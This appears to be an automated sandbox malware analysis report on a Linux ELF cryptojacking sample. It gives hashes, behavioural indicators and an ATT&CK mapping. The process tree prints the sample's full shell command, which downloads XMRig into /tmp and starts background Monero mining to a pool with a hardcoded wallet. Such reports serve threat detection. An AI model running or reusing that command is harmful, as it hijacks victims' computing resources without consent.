xmrig_linux | 884107422df524c5d7584f267910c4d738fa09187a6f835374038ed27c2a4fc8

Analysis

max time kernel
58s
max time network
133s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
06/03/2024, 12:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
Size

28KB
MD5

81959aa15f618e7f878587c3fbee558f
SHA1

63f4ff2f4e073f771f3360a97a91d83cb7f397a7
SHA256

884107422df524c5d7584f267910c4d738fa09187a6f835374038ed27c2a4fc8
SHA512

1cb22d5f938921717cc8ed77bb9fc3250a85e7256ae26c7503e2890d434e9bf4b559708f32cab301b482825c8ca86ce5b60b3b9b45700334537d5f12c9cc64b0
SSDEEP

768:Z0TF6I/0OdgyoCJSqeYCU7hWdj8qFCT5FL9GI0:ZwH8O67CCg7YdAMCTe

Score

10^/10

xmrig_linux miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself		1466	SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

Impair Defenses

T1562

description	ioc
File opened for modification	/dev/watchdog
File opened for modification	/dev/misc/watchdog

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/sys/kernel/random/boot_id	tar
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/exe	SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig-6.21.1/config.json	tar
File opened for modification	/tmp/xmrig-6.21.1-linux-x64.tar.gz	wget
File opened for modification	/tmp/xmrig-6.21.1/xmrig	tar
File opened for modification	/tmp/xmrig-6.21.1/SHA256SUMS	tar

/tmp/SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
/tmp/SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
1⤵
- Changes its process name
- Reads runtime system information
PID:1466

/bin/sh
sh -c "wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz && tar -xzf xmrig-6.21.1-linux-x64.tar.gz && mv xmrig-6.21.1 /tmp/ && rm -rf xmrig-6.21.1-linux-x64.tar.gz && cd /tmp/xmrig-6.21.1 && chmod 777 * && ./xmrig --opencl --cuda -o xmr-eu1.nanopool.org:14433 -u 49WVNTHfo5c7zfYi3METsCPW93hLJFYNKBS5GZDxSbuZA1FNJULGvkkY5y7sDozjTTMgeT3JyqLfV38TGzqMPuiGJzeHmeZ --tls --coin monero --background"
1⤵
PID:1469
- /usr/bin/wget
  wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1473
- /usr/bin/tar
  tar -xzf xmrig-6.21.1-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1931
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1932
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1932
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1932
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1932
- /usr/bin/mv
  2⤵
  - Reads runtime system information
  PID:1933

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/xmrig-6.21.1-linux-x64.tar.gz

Filesize
660KB

MD5
9f4425baac2f1e5eada1e0023b99051c

SHA1
828def9efa7455a34c59566526e639eb5da011d3

SHA256
ffd2d2680728223015c76d0cd7c2fd7d960069412f5aa3ab70629a210205230a

SHA512
75611a7ec51475b1d5c8c524d376900997a3002b935a00a8e618b08bd91573f4ed9cfcffb91d2e795153a5d460302d5b963730f8ec3ac396d9872d70c11c89cc

Download Submit
/tmp/xmrig-6.21.1/SHA256SUMS

Filesize
150B

MD5
0eeaf66a6ba6b6934ffefce538342572

SHA1
8f28c8a7345c85b2ae78924828aa16e1b6be7b97

SHA256
aa89fb25473e544be6a5cbe6a6106e220fc6cd4b935fe76bc73a19b3b6daed60

SHA512
5a8e8a77e97f2b221bf1a9097a2f19a2c3c0ed376d7e2561a41c6d74203ddbe9d0482a818d17555da44088e511b3724dd41dd7cc91e3ebaadab9c176b1a7b57d

Download Submit
/tmp/xmrig-6.21.1/config.json

Filesize
2KB

MD5
66f38c96a4901e7b345787c447842b3e

SHA1
2aa9b4d1bd2edd5d81bd9725e9318edaee67531f

SHA256
2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec

SHA512
71757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f

Download Submit
/tmp/xmrig-6.21.1/xmrig

Filesize
7.4MB

MD5
5849c28ac8e6452e4f0fb6dec4cc133f

SHA1
997cf47e1b5b5751e5632c5555bcdc521616becb

SHA256
c39a9d5a2f6f04d285f0516d5b9f2f31fab96df2f41c21e440d19a55581ac244

SHA512
8379ea31373db2452a37c713df1ecbb3bc1396c58b6450960d624e95b89cf7954547fab3a747407ffd120b4e7b9751bb2cdb95891652240e356a6143f183d6d2

Download Submit